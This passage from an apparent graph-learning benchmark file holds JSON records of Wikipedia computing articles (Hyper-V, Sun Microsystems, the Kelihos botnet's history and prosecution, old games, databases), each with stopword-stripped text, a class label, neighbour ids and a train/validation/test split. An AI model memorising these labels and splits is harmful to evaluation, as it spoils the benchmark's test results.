connection network connection use audio redirection feature windows 8.1 windows server 2012 r2 add enhanced session mode provides redirection without network connection optical drives virtualized guest vm read-only officially hyper-v support host/root operating system optical drives pass-through guest vms result burning discs audio cds video cd/dvd-video playback supported however workaround exists using iscsi protocol setting iscsi target host machine optical drive talked standard microsoft iscsi initiator microsoft produces iscsi target software alternative third party products used cpus without second level address translation slat installation wddm accelerated graphics drivers primary os cause dramatic drop graphic performance occurs graphics drivers access memory pattern causes translation lookaside buffer flushed frequently cache thrashing windows server 2008 microsoft officially supported hyper-v default vga drivers support windows aero higher resolutions rotation multi-monitor display however unofficial workarounds available certain cases older non-wddm graphics drivers sometimes cause performance issues though drivers always install smoothly windows server intel integrated graphics cards cause tlb flushing even wddm drivers nvidia graphics drivers experience problems long windows aero turned 3d applications running windows server 2008 r2 microsoft added support second level address translation hyper-v since slat required run hyper-v windows server problem continue occur non-slat cpu used accelerated graphics drivers however slat required run hyper-v client versions windows 8 hyper-v windows server 2008 support live migration guest vms live migration defined maintaining network connections uninterrupted services vm migration physical hosts instead hyper-v server 2008 enterprise datacenter editions supports quick migration guest vm suspended one host resumed another host operation happens time takes transfer active memory guest vm network first host second host however release windows server 2008 r2 live migration supported use cluster shared volumes csvs allows failover individual vm opposed entire host failover seems node hyper-v server vm fails vm running failed node may migrate live nodes independently vms lun running nodes share lun failed node hyper-v clustering hyper-v nodes vms. see also cluster shared volumes windows server 2012 implementation hyper-v version 3.0 introduced many new features increase vm mobility including ability execute simultaneous live migrations windows server 2008 r2 supported live migrating single vm time significantly increasing time required carry administrative tasks draining node scheduled maintenance real limiting factor hardware network bandwidth available windows server 2012 also supports new shared nothing live migration option traditional shared storage required order complete migration also referred “ live system migration ” shared nothing live migration move running vm storage one hyper-v host another without perceived downtime live migration different host os versions possible although soon addressed windows server 2012 r2 windows server 2012 also introduced ability use simple smb shares shared storage option conjunction new scale file services role server 2012 highly available environments alleviating need expensive sans particularly useful low budget environments without need sacrifice performance due many new improvements smb3 stack windows server 2012 fully support live migration vms running smb shares whether live live system migration hyper-v windows server 2012 also supports ability migrate running vm storage whereby active virtual machines storage moved one infrastructure another without vm workload affected reducing limitations associated vm mobility introduction windows server 2012 r2 smb 3.0 introduced transport option live migration either clustered non-clustered virtualization hosts enables hyper-v live migration leverage additional benefits smb 3.0 brings smb multichannel smb direct conjunction rdma nics increased live migration performance windows xp frequently accesses cpu apic task-priority register tpr interrupt request level changes causing performance degradation running guests hyper-v. microsoft fixed problem windows server 2003 later intel adds tpr virtualization flexpriority vt-x intel core 2 stepping e onwards alleviate problem amd similar feature amd-v uses new register purpose however means guest use different instructions access new register amd provides driver called amd-v optimization driver installed guest network card teaming link aggregation supported nic manufacturer supplied drivers support nic teaming however windows server 2012 thus version hyper-v included supports software nic teaming hyper-v management tools compatible windows vista home basic home premium windows 7 home premium home basic starter hyper-v 2012 managed windows 8 windows server 2012 successors hyper-v uses vt-x intel amd-v amd x86 virtualization since hyper-v native hypervisor long installed third-party software use vt-x amd-v. instance intel haxm android device emulator used android studio microsoft visual studio run hyper-v installed 64-bit skus windows 8 pro enterprise later come special version hyper-v called client hyper-v. windows server 2012 introduced many new features hyper-v. windows server 2012 r2 microsoft introduced another set new features hyper-v windows server 2016 windows 10 1607 adds hyper-v windows server 2019 windows 10 1809 adds",
    "neighbors": [
      1540,
      6150,
      11270,
      2058,
      3082,
      5643,
      4624,
      18,
      1560,
      537,
      540,
      3102,
      9762,
      8227,
      6692,
      8740,
      1577,
      10281,
      2101,
      7733,
      10812,
      10302,
      3648,
      5697,
      582,
      1094,
      5702,
      10310,
      1098,
      7754,
      8266,
      4173,
      4174,
      10828,
      7248,
      9808,
      4178,
      4695,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      4238,
      2193,
      9874,
      10900,
      4248,
      2713,
      6297,
      7838,
      9377,
      3235,
      2212,
      4771,
      6820,
      1703,
      2221,
      5300,
      7349,
      7351,
      7863,
      2236,
      2749,
      10428,
      2244,
      6852,
      8391,
      200,
      9420,
      3791,
      4316,
      2782,
      3294,
      7905,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      5356,
      9455,
      1776,
      10993,
      8439,
      3834,
      5371,
      1791,
      8959,
      11519,
      5378,
      5380,
      6924,
      3856,
      8976,
      5394,
      8466,
      11539,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      6438,
      295,
      5928,
      3881,
      10024,
      10026,
      10537,
      10029,
      7983,
      1844,
      9525,
      11572,
      823,
      10039,
      6972,
      318,
      3394,
      8520,
      9033,
      4429,
      5457,
      1362,
      3922,
      6481,
      6993,
      7507,
      4439,
      9048,
      5465,
      11097,
      2910,
      2402,
      2919,
      4458,
      6506,
      9066,
      9585,
      9593,
      2943,
      2944,
      5504,
      3463,
      7049,
      1418,
      5003,
      5004,
      1935,
      8080,
      4505,
      922,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      6584,
      5049,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      8136,
      3535,
      2515,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      1513,
      4074,
      6637,
      9709,
      11248,
      6641,
      499,
      3573,
      10747
    ],
    "mask": "Test"
  },
  {
    "node_id": 9656,
    "label": 0,
    "text": "Yseop:yseop yseop pronounced easy-op privately held multinational computer software company offices new york oxford uk lyon bogota dallas paris company commercialises artificial intelligence powered natural language generation software yseop compose flagship solution automates writing written reports financial services business intelligence marketing writes english spanish french german dutch japanese yseop commercializes natural language generation nlg software applies reasoning data turns written recommendations reports speed 3,000 pages per second software also used write newspaper stories data explain motivation context behind numbers date yseop software write english spanish french german premise self-service nlg software market yseop software used across variety industries financial industry including example société générale factset insurance 2014 tom austin vice president fellow gartner cited yseop narrative science automated insights part smart machine technological revolution promise one disruptive changes ever 2014 yseop also listed one top 10 innovative startups france electronic business group digital innovation summit paris 2015 yseop honored leading vendor—digital solutions financial advisors 2015 myprivatebanking research 2015 economist featured yseop one front cover articles 2016 ventana research named yseop software one innovative us year 2016 2019 future finance partnership deloitte granted societe generale innovative initiative year award digitization management control processes based yseop platform https //www.businesswire.com/news/home/20190410005068/fr/ research development yseop technology began 20 years ago team mathematical lab called ens cachan france yseop first commercialized product middleware end 2008 opened american subsidiary dallas texas 2012 yseop founded alain kaeser john rauscher sold start-up called sunopsis oracle 2006 competing companies yseop composein nlg industry include narrative science firm based chicago automated insights firm based durham north carolina retresco based berlin germany united robots sweden arria nlg yseop software suite also competes indirectly ibm watson",
    "neighbors": [
      2440,
      6576,
      6695
    ],
    "mask": "Test"
  },
  {
    "node_id": 9657,
    "label": 3,
    "text": "Java_processor:java processor java processor implementation java virtual machine jvm hardware words java bytecode makes instruction set abstract machine becomes instruction set concrete machine today popular form high-level language computer architecture many java processors available including",
    "neighbors": [
      9665,
      8868,
      7173,
      5612,
      5872,
      6322,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9658,
    "label": 3,
    "text": "Sorcerian:sorcerian first game developed nihon falcom fifth dragon slayer line games originally released nec pc-8801 1987 later ported personal computer platforms nec pc-9801 nec pc-88va sharp x1 turbo msx2 released title dragon slayer v sorcerian english version ms-dos pcs published sierra entertainment 1990 ports atari st commodore amiga apple iigs macintosh platforms announced released 1997 falcom released sorcerian forever microsoft windows-based pcs 2000 falcom released sorcerian original remake sorcerian microsoft windows-based pcs addition console versions sorcerian somewhat differing content pc counterparts developed version mega drive developed sega version pc engine cd developed victor musical industries version dreamcast developed victor interactive software mega drive version re-released wii virtual console september 16 2008 ios version released january 20 2012 sorcerian side-scrolling action-rpg player create ten characters four members present party time character highly customizable four different classes/races fighter wizard elf dwarf 60 possible jobs/occupations ranging clown exorcist available perform strengths weaknesses affecting seven primary attributes strength intelligence protection magic resistance vitality dexterity karma different ways well different equipment limitations player choose fifteen different scenarios quests play order choice party must battle enemies perform tasks within given levels clear scenario moving onto another scenario choice player controls entire party time four members running line jumping sequence attacking unison party members follow behind manner similar options arcade shooter gradius 1985 sorcerian also employs class-based puzzles using high-strength character force open doors characters default starting age 16 time player begins new scenario year passes additional time passes towns character goes training enchants items characters age different rates depending race humans reaching old age 60 dwarves 100 elves 200 upon reaching old age every year passes character die permanently random time also “ advance time ” speed flow time another new feature sorcerian episodic format extended across various expansion packs besides default fifteen scenarios come game number additional scenario packs released aging system created additional scenario packs mind number add-on expansion packs containing new scenarios developed pc-8801 version sorcerian falcom companies soundtrack original sorcerian composed yuzo koshiro mieko ishikawa reiko takebayashi hideya nagata takahito abe falcom-developed additional scenarios handled solely ishikawa music original sorcerian arranged kenji kawai pc engine cd release rob atesalp ken allen composed mt-32 midi-compatible arrangement soundtrack sierra entertainment english version game soundtrack releases sorcerian include 1990 famicom tsūshin famitsu reviewed sega mega drive genesis version game giving generally positive score 27 40 computer gaming world reviewed pc dos version october 1991 issue noted interesting feature two liked game division many miniquests stating instead usual long adventure one sports fifteen separate small quests allows certain amount variety however disliked magic system stated action arcade style typical japanese game find irksome noted hack-and-slash puzzles solved along way magazine concluded sorcerian good change pace comfortable arcade action 2008 game designer hideki kamiya listed sorcerian among favorite games time citing one games influenced work production platinumgames title scalebound kamiya said inspired sorcerian well hydlide 3 noted influence sorcerian nowiki /nowiki fantasy theme gigantic monsters different scenarios expansive possibilities tons adventures enemies hydra boss lots amazing dragons version sorcerian ios base game includes 5 free scenarios maximum party size 5 characters pay versions include 10 extra scenarios maximum party size 10 characters part sorcerian 25th anniversary 2012-12-06 2012-12-20 sorcerian ios released free 3 in-game items 10000gold revival lv3 x2 magic item x3 free registering aeriagames member gets revival lv3 x3 in-game items",
    "neighbors": [
      770,
      3113,
      10217,
      6797,
      9166,
      6129,
      10931,
      11443,
      11575,
      1596
    ],
    "mask": "Train"
  },
  {
    "node_id": 9659,
    "label": 3,
    "text": "Deus_Ex_Machina_(video_game):deus ex machina video game deus ex machina video game designed created mel croucher published automata uk zx spectrum october 1984 later converted popular 8-bit formats game first accompanied fully synchronised soundtrack featured narration celebrity artists music cast included ian dury jon pertwee donna bailey frankie howerd e.p thompson croucher also composed music andrew stagg coded original spectrum version colin jones later known author/publisher colin bradshaw-jones programmer commodore 64 version game charts life defect formed machine conception growth evolution eventually death progression loosely based seven ages man shakespeare play like includes many quotations parodies despite critical acclaim time game conform conventions packaging pricing required distributors retailers game sold mail-order direct public subsequently gained cult status underground art game game name latin expression deus ex machina literally meaning god machine players game take control defected machine taken form human body players would experience different stages life way cell senile old considered visual-audio entertainment although game sound separated audio cassette tape needs played alongside game length audio cassette 46 minutes also length game although game could played without audio cassette would make easier understand help soundtrack soundtrack includes songs musical compositions also voices famous actors game comes full transcript speech could times played without audio deus ex machina zx spectrum 1984 mobygames retrieved 2018-12-11 croucher retrospectively viewed game disappointment saying sold game sensible price wanted put lovely poster nice packaging double vinyl gatefold result price £15 compared usual £8 meant sales low game broke even 2010 game included one titles book 1001 video games must play die re-imagining game went production 2010 title deus ex machina 2 design creation croucher new cast led sir christopher lee programmer chyna whyne machine chris madin defect joaquim de almeida defect police original ian dury session vocals 2014 croucher released book game history making new game book entitled deus ex machina best game never played life game sequel eventually released 2015 2018 rights automata uk games transferred company subvert ltd",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9660,
    "label": 2,
    "text": "Criticism_of_desktop_Linux:criticism desktop linux criticism desktop linux history comment perceived shortcomings linux operating system installed desktop computers criticisms questioned plethora choice usefulness desktop systems also multi-media playback audio development linux based android operating system dominates smartphone market many countries linux used new york stock exchange supercomputers used relatively desktop laptop computers linus torvalds expressed intended linux kernel used desktop operating systems argues android widely used comes pre-installed new phones linux distributions would need bundled new computers gain market share linux criticized number reasons including lack user-friendliness steep learning curve inadequate desktop use lacking support exotic hardware relatively small games library lacking native versions widely used applications missing gui api standardization critics believe linux ever gain large share desktop market may 2009 preston gralla contributing editor computerworld.com believed linux never important desktop/notebook users even though felt simple straightforward use low usage indicative low importance desktop market essay luxury ignorance open-source horror story eric s. raymond stated lack usability many open-source linux tools lack manuals lack thought users experience james donald princeton university analyzed shared library concepts several operation systems 2003 paper titled improved portability shared libraries worried lack windows application compatibility group equivalent desktop linux criticized late 2010 missed opportunity become significant force desktop computing pc world executive editor robert strohmeyer commented although linux exceptional security stability well great performance usability time desktop linux succeed missed nick farrell writing techeye felt release windows vista missed opportunity grab significant market share critics indicated linux fail desktop due geeky hard use obscure praise distributions strohmeyer saying best-known distribution ubuntu received high marks usability every major player technology press laid blame failure open-source community strohmeyer named fierce ideology open-source community large responsible farrell stated biggest killer putting penguin software desktop linux community think apple fanboys completely barking role models sanity loudmouthed open sauce religious loonies like many fundamentalists totally inflexible – waving gnu handed god richard stallman accusation over-zealous advocacy dealt previously 2006 dominic humphries stated aims linux community desktop market-share popularity linux best operating system made community choice applications free software development offers led people criticize linux confusing new users past well large number choices linux desktop operating systems although argued choice one key strengths linux tony mobily editor free software magazine identified problems server roots linux article 2009 software installation gnu/linux still broken – path fixing august 2014 debconf portland also linus torvalds voiced unhappiness binary application packaging linux distro ecosystem lack strong api standards multimedia criticised example adobe systems development blog penguin.swf discusses complicated linux audio infrastructure analysis welcome jungle nearly one dozen actively supported systems called audio jungle pulseaudio main developer lennart poettering stated difficult programmers know audio api use purpose linux past criticized lack driver support however largely due manufacturers supporting linux system n't 2004 ati started development linux drivers major adoption linux servers android encouraged driver development linux wireless driver support problem area linux one time many drivers missing users required use solutions ndiswrapper utilizes drivers made windows operating system broadcom particularly criticized releasing drivers issue also worked around extracting proprietary firmware use linux broadcom since released free open-source drivers linux kernel eliminating issues modern broadcom chipsets problem largely fixed recent years fairly large number drivers adding support wireless cards available today however many features still missing drivers mostly due manufacturers providing specifications documentation thus forcing developers reverse engineer cards",
    "neighbors": [
      2560,
      5644,
      5139,
      9237,
      10780,
      4637,
      3618,
      9257,
      1584,
      9266,
      2109,
      10817,
      8772,
      2134,
      3162,
      2658,
      6244,
      6763,
      11391,
      7812,
      8326,
      6797,
      10382,
      657,
      2195,
      9882,
      6301,
      1694,
      10933,
      4803,
      6352,
      3289,
      3802,
      10464,
      1761,
      4841,
      7920,
      7938,
      4360,
      1813,
      5410,
      1833,
      815,
      5430,
      823,
      6968,
      3395,
      3911,
      10063,
      4437,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      1406,
      3458,
      7555,
      11654,
      4493,
      10127,
      11155,
      1431,
      9637,
      935,
      4011,
      8621,
      9646,
      1456,
      10173,
      10687,
      4040,
      457,
      5067,
      8147,
      9696,
      11232,
      1506,
      8676,
      2021,
      9190,
      10732,
      1524,
      2036,
      5620
    ],
    "mask": "Test"
  },
  {
    "node_id": 9661,
    "label": 1,
    "text": "Schema_migration:schema migration software engineering schema migration also database migration database change management refers management incremental reversible changes relational database schemas schema migration performed database whenever necessary update revert database schema newer older version migrations performed programmatically using schema migration tool invoked specified desired schema version tool automates successive application reversal appropriate sequence schema changes brought desired state schema migration tools aim minimize impact schema changes existing data database despite preservation data general guaranteed schema changes deletion database column destroy data i.e values stored column rows table deleted instead tools help preserve meaning data reorganize existing data meet new requirements since meaning data often encoded configuration tools usually needs manual intervention schema migration allows fixing mistakes adapting data requirements change essential part software evolution especially agile environments see applying schema migration production database always risk development test databases tend smaller cleaner data better understood everything else fails amount data small enough human process production databases usually huge old full surprises surprises come many sources reasons migration process needs high level discipline thorough testing sound backup strategy developing software applications backed database developers typically develop application source code tandem evolving database schema code typically rigid expectations columns tables constraints present database schema whenever needs interact one version database schema code developed considered fully compatible version source code software testing developers may mock presence compatible database system unit testing level testing higher e.g integration testing system testing common developers test application local remote test database schematically compatible version source code test advanced applications migration subject migration testing schema migration technology data models longer need fully designed up-front capable adapted changing project requirements throughout software development lifecycle teams software developers usually use version control systems manage collaborate changes made versions source code different developers develop divergent relatively older newer branches source code make changes additions development supposing software development interacts database every version source code associated least one database schema compatible good software testing practice schema migrations performed test databases ensure schema compatible source code streamline process schema migration tool usually invoked part automated software build prerequisite automated testing phase schema migration tools said solve versioning problems database schemas version control systems solve versioning problems source code practice many schema migration tools actually rely textual representation schema changes files containing sql statements version history schema changes effectively stored alongside program source code within vcs approach ensures information necessary recover compatible database schema particular code branch recoverable source tree another benefit approach handling concurrent conflicting schema changes developers may simply use usual text-based conflict resolution tools reconcile differences schema migration tooling could seen facility track history evolving schema developers longer need remove entire test database order create new test database scratch e.g using schema creation scripts ddl generation tools generation test data costs lot time developers avoid regenerating test data small non-destructive changes schema",
    "neighbors": [
      2688,
      2819,
      9481,
      6154,
      10505,
      10518,
      4376,
      1816,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      3768,
      3004,
      9663,
      4416,
      5441,
      11457,
      8518,
      9286,
      72,
      10573,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      10459,
      9183,
      11362,
      10471,
      8808,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 9662,
    "label": 3,
    "text": "Oil's_Well:oil well oil well computer game published sierra on-line 1983 game written atari 8-bit family thomas j. mitchell oil well similar 1982 arcade game anteater re-themed drilling oil instead hungry insectivore ports released 1983 apple ii commodore 64 1984 colecovision ibm pc booter 1985 msx sharp x1 version improved visuals without mitchell involvement released ms-dos 1990 player attempts manage oil drilling operation collect oil done moving drill head maze using four directional control buttons head trailed pipeline connecting base subterranean creatures populate maze head destroy creatures pipeline vulnerable player traverses maze pipe grows longer pressing button quickly retracts head player advance eight different levels ahoy stated commodore version graphics sounds serviceable gameplay experience unique ... recommended infoworld called ibm pcjr version clever basic game early 1980s u.s. gaming magazine computer games awarded oil well 1984 golden floppy award excellence category maze game year despite already clone anteater several additional clones borrowed theme oil well pipeline run commodore 64 1990 oilmania atari st 1991",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9663,
    "label": 1,
    "text": "Locks_with_ordered_sharing:locks ordered sharing databases transaction processing term locks ordered sharing comprises several variants two phase locking 2pl concurrency control protocol generated changing blocking semantics locks upon conflicts one variant identical strict commitment ordering sco",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      7446,
      10518,
      4376,
      9112,
      5658,
      7581,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      4416,
      2369,
      5441,
      11457,
      3398,
      8518,
      72,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 9664,
    "label": 4,
    "text": "Kelihos_botnet:kelihos botnet kelihos botnet also known hlux botnet mainly involved spamming theft bitcoins kelihos botnet first discovered around researchers originally suspected found new version either storm waledac botnet due similarities modus operandi source code bot analysis botnet showed instead new 45,000-infected-computer-strong botnet capable sending estimated spam messages day microsoft took botnet operation codenamed operation b79 time microsoft filed civil charges dominique alexander piatti dotfree group sro 22 john doe defendants suspected involvement botnet issuing 3,700 subdomains used botnet charges later dropped microsoft determined named defendants intentionally aid botnet controllers january 2012 new version botnet discovered one sometimes referred kelihos.b version 2 consisting estimated 110,000 infected computers month microsoft pressed charges russian citizen andrey sabelnikov former security professional alleged creator kelihos botnet sourcecode second version botnet shut several privately owned firms sinkholing – technique gave companies control botnet cutting original controllers following shutdown second version botnet new version surfaced early 2 april though disagreement research groups whether botnet simply remnants disabled version 2 botnet new version altogether version botnet currently consists estimated 70,000 infected computers kelihos.c version mostly infects computers facebook sending users website malicious download links clicked trojan horse named fifesoc downloaded turns computer zombie part botnet 24 november 2015 kelihos botnet event occurred causing widespread false positives blacklisted ips ″november 24 2015 widespread false positives earlier today large scale kelihos botnet event occurred large scale many email installations seeing excess 20 kelihos spam see inbound email volume jump volume much 500 n't unusual thing normally cbl/xbl successfully dealing large scale kelihos spam spikes like often daily years email allegedly us federal reserve saying something restrictions u.s. federal wire ach online payments notice fraudulent attached excel spreadsheet .xls contained macro instructions downloader download windows executable virus likely dyreza dridex malware detection rules initially deployed cbl unfortunately insufficiently detailed listed number ip addresses error.″ affidavit unsealed february 5 2018 showed apple ’ unexpected role bringing russian spam king justice peter levashov allegedly ran kelihos botnet alias “ severa ” renting access spammers cybercriminals despite levashov ’ significant efforts anonymity court records show federal agents surveilling icloud account since may 20th 2016 funneling back crucial information may led arrest standing federal icloud warrant would given authorities running tab ip addresses used log account could easily tipped vacation barcelona spain arrested request us law enforcement extradited united states prosecution kelihos botnet so-called peer-to-peer botnet individual botnet nodes capable acting command-and-control servers entire botnet traditional non-peer-to-peer botnets nodes receive instructions work limited set servers – servers removed taken botnet longer receive instructions therefore effectively shut peer-to-peer botnets seek mitigate risk allowing every peer send instructions entire botnet thus making difficult shut first version botnet mainly involved denial-of-service attacks email spam version two botnet added ability steal bitcoin wallets well program used mine bitcoins spam capacity allows botnet spread sending malware links users order infect trojan horse though later versions mostly propagate social network sites particular facebook comprehensive list kelihos spam found following research paper february 2 2018 united states department justice announced russian national extradited spain arraigned connecticut charges stemming alleged operation kelihos botnet peter yuryevich levashov 37 also known pyotr levashov petr levashov peter severa petr severa sergey astakhov st. petersburg detained april 7 2017 barcelona arrested spanish authorities based upon criminal complaint arrest warrant issued united states district connecticut 3 february 2018 pleaded guilty charges wire email fraud hacking identity theft conspiracy appearing federal judge u.s. state connecticut remains detention september 2018 peter yuryevich levashov pleaded guilty",
    "neighbors": [
      1024,
      3072,
      10756,
      535,
      9761,
      4644,
      4133,
      4648,
      3116,
      46,
      10297,
      3643,
      7739,
      1087,
      1608,
      3657,
      8779,
      81,
      8789,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      3724,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      10457,
      4314,
      9435,
      3807,
      5349,
      1254,
      10477,
      9460,
      5886,
      2815,
      3843,
      10502,
      3347,
      4883,
      2325,
      278,
      10003,
      8489,
      11052,
      9518,
      7996,
      11583,
      6484,
      857,
      1882,
      7515,
      8032,
      3941,
      4462,
      3956,
      9082,
      9087,
      11152,
      10132,
      9630,
      1440,
      5024,
      10657,
      11175,
      939,
      5547,
      1970,
      441,
      1979,
      4027,
      8640,
      9154,
      8133,
      2508,
      4054,
      988,
      1504,
      9186,
      2542,
      2041,
      507,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 9665,
    "label": 7,
    "text": "Sun_Microsystems:sun microsystems sun microsystems inc. american company sold computers computer components software information technology services created java programming language solaris operating system zfs network file system nfs sparc sun contributed significantly evolution several key computing technologies among unix risc processors thin client computing virtualized computing sun founded february 24 1982 height sun headquarters santa clara california part silicon valley former west campus agnews developmental center april 20 2009 announced oracle corporation would acquire sun 7.4 billion deal completed january 27 2010 sun products included computer servers workstations built risc-based sparc processor architecture well x86-based amd opteron intel xeon processors sun also developed storage systems suite software products including solaris operating system developer tools web infrastructure software identity management applications technologies included java platform nfs general sun proponent open systems particularly unix also major contributor open-source software evidenced 1 billion purchase 2008 mysql open-source relational database management system various times sun manufacturing facilities several locations worldwide including newark california hillsboro oregon linlithgow scotland however time company acquired oracle outsourced manufacturing responsibilities initial design became sun first unix workstation sun-1 conceived andy bechtolsheim graduate student stanford university palo alto california bechtolsheim originally designed sun workstation stanford university network communications project personal cad workstation designed around motorola 68000 processor advanced memory management unit mmu support unix operating system virtual memory support built first ones spare parts obtained stanford department computer science silicon valley supply houses february 24 1982 scott mcnealy andy bechtolsheim vinod khosla stanford graduate students founded sun microsystems bill joy berkeley primary developer berkeley software distribution bsd joined soon counted one original founders sun name derived initials stanford university network sun profitable first quarter july 1982 1983 sun known producing 68k-based systems high-quality graphics computers dec vax run 4.2bsd licensed computer design manufacturers typically used build multibus-based systems running unix unisoft sun initial public offering 1986 stock symbol sunw sun workstations later sun worldwide symbol changed 2007 java sun stated brand awareness associated java platform better represented company current strategy sun logo features four interleaved copies word sun form rotationally symmetric ambigram designed professor vaughan pratt also stanford initial version logo orange sides oriented horizontally vertically subsequently rotated stand one corner re-colored purple later blue dot-com bubble sun began making much money shares rose dramatically also began spending much hiring workers building genuine demand much web start-up companies anticipating business would never happen 2000 bubble burst sales sun important hardware division went free-fall customers closed shop auctioned high-end servers several quarters steep losses led executive departures rounds layoffs cost cutting december 2001 stock fell 1998 pre-bubble level 100 kept falling faster many tech companies year later dipped 10 tenth even 1990 bounced back 20 mid-2004 sun closed newark california factory consolidated manufacturing hillsboro oregon 2006 rest newark campus put market 2004 sun canceled two major processor projects emphasized high instruction-level parallelism operating frequency instead company chose concentrate processors optimized multi-threading multiprocessing ultrasparc t1 processor codenamed niagara company also announced collaboration fujitsu use japanese company processor chips mid-range high-end sun servers servers announced april 17 2007 m-series part sparc enterprise series february 2005 sun announced sun grid grid computing deployment offered utility computing services priced us 1 per cpu/hour processing per gb/month storage offering built upon existing 3,000-cpu server farm used internal r 10 years sun marketed able achieve 97 utilization august 2005 first commercial use grid announced financial risk simulations later launched first software service product january 2005 sun reported net profit 19 million fiscal 2005 second quarter first time three years followed net loss 9 million gaap basis third quarter 2005 reported april 14 2005 january 2007 sun reported net gaap profit 126 million revenue 3.337 billion fiscal second quarter shortly following news announced kohlberg kravis roberts kkr would invest 700 million company sun engineering groups bangalore beijing dublin grenoble hamburg prague st. petersburg tel aviv tokyo trondheim 2007–2008 sun posted revenue 13.8 billion 2 billion cash first-quarter 2008 losses 1.68 billion revenue fell 7 12.99 billion sun stock lost 80 value november 2007 november 2008 reducing company market value 3 billion falling sales large corporate clients sun announced plans lay 5,000 6,000 workers 15–18 work force expected save 700 million 800 million year result moves also taking 600 million charges may 11 2009 following shareholders held 100,000 common shares sun 9.50 per share offered oracle received amounts indicated acquisition closed first decade sun history company positioned products technical workstations competing successfully low-cost vendor workstation wars 1980s shifted hardware product line emphasize servers storage high-level telecom control systems operational support systems service predominantly used sun equipment sun originally used motorola 68000 family central processing units sun-1 sun-3 computer series sun-1 employed 68000 cpu sun-2 series 68010 sun-3 series based 68020 later sun-3x using 68030 1987 company began using sparc risc processor architecture design computer systems starting sun-4 line sparc initially 32-bit architecture sparc v7 introduction sparc v9 architecture 1995 added 64-bit extensions sun developed several generations sparc-based computer systems including sparcstation ultra sun blade series workstations sparcserver netra enterprise sun fire line servers early 1990s company began extend product line include large-scale symmetric multiprocessing servers starting four-processor sparcserver 600mp followed 8-processor sparcserver 1000 20-processor sparccenter 2000 based work done conjunction xerox parc 1995 company introduced sun ultra series machines equipped first 64-bit implementation sparc processors ultrasparc late 1990s transformation product line favor large 64-bit smp systems accelerated acquisition cray business systems division silicon graphics 32-bit 64-processor cray superserver 6400 related sparccenter led 64-bit sun enterprise 10000 high-end server otherwise known starfire september 2004 sun made available systems ultrasparc iv first multi-core sparc processor followed ultrasparc iv+ september 2005 revisions higher clock speeds 2007 cpus used powerful enterprise class high-end cc-numa servers developed sun sun fire e25k november 2005 sun launched ultrasparc t1 notable ability concurrently run 32 threads execution 8 processor cores intent drive efficient use cpu resources particular importance data centers increasing need reduce power air conditioning demands much comes heat generated cpus t1 followed 2007 ultrasparc t2 extended number threads per core 4 8 sun open sourced design specifications t1 t2 processors via opensparc project 2006 sun ventured blade server high density rack-mounted systems market sun blade distinct sun blade workstation april 2007 sun released sparc enterprise server products jointly designed sun fujitsu based fujitsu sparc64 vi later processors m-class sparc enterprise systems include high-end reliability availability features later t-series servers also badged sparc enterprise rather sun fire april 2008 sun released servers ultrasparc t2 plus smp capable version ultrasparc t2 available 2 4 processor configurations first coolthreads cpu multi-processor capability made possible build standard rack-mounted servers could simultaneously process massive 256 cpu threads hardware sun sparc enterprise t5440 considered record industry since 2010 development sun machines based sparc architecture including new sparc t-series servers sparc t3 t4 chips done part oracle corporation hardware division late 1980s sun also marketed intel 80386-based machine sun386i designed hybrid system running sunos time supporting dos applications remained market brief time follow-up 486i upgrade announced prototype units ever manufactured sun brief first foray x86 systems ended early 1990s decided concentrate sparc retire last motorola systems 386i products move dubbed mcnealy wood behind one arrowhead even sun kept hand x86 world release solaris pc compatibles began shipping 1993 1997 sun acquired diba inc. followed later acquisition cobalt networks 2000 aim building network appliances single function computers meant consumers sun also marketed network computer term popularized eventually trademarked oracle javastation diskless system designed run java applications although none business initiatives particularly successful cobalt purchase gave sun toehold return x86 hardware market 2002 sun introduced first general purpose x86 system lx50 based part previous cobalt system expertise also sun first system announced support linux well solaris 2003 sun announced strategic alliance amd produce x86/x64 servers based amd opteron processor followed shortly sun acquisition kealia startup founded original sun founder andy bechtolsheim focusing high-performance amd-based servers following year sun launched opteron-based sun fire v20z v40z servers java workstation w1100z w2100z workstations september 12 2005 sun unveiled new range opteron-based servers sun fire x2100 x4100 x4200 servers designed scratch team led bechtolsheim address heat power consumption issues commonly faced data centers july 2006 sun fire x4500 x4600 systems introduced extending line x64 systems support solaris also linux microsoft windows january 22 2007 sun announced broad strategic alliance intel intel endorsed solaris mainstream operating system mission critical unix xeon processor-based systems contributed engineering resources opensolaris sun began using intel xeon processor x64 server line starting sun blade x6250 server module introduced june 2007 may 5 2008 amd announced operating system research center osrc expanded focus include optimization sun opensolaris xvm virtualization products amd based processors although sun initially known hardware company software history began founding 1982 co-founder bill joy one leading unix developers time contributed vi editor c shell significant work developing tcp/ip bsd unix os sun later developed software java programming language acquired software staroffice virtualbox mysql sun used community-based open-source licensing major technologies support products open source technologies gnome-based desktop software called java desktop system originally code-named madhatter distributed solaris operating system one point linux sun supported java enterprise system middleware stack linux released source code solaris open-source common development distribution license via opensolaris community sun positioning includes commitment indemnify users software intellectual property disputes concerning software offers support services variety pricing bases including per-employee per-socket 2006 report prepared eu unu-merit stated sun largest corporate contributor open source movements world according report 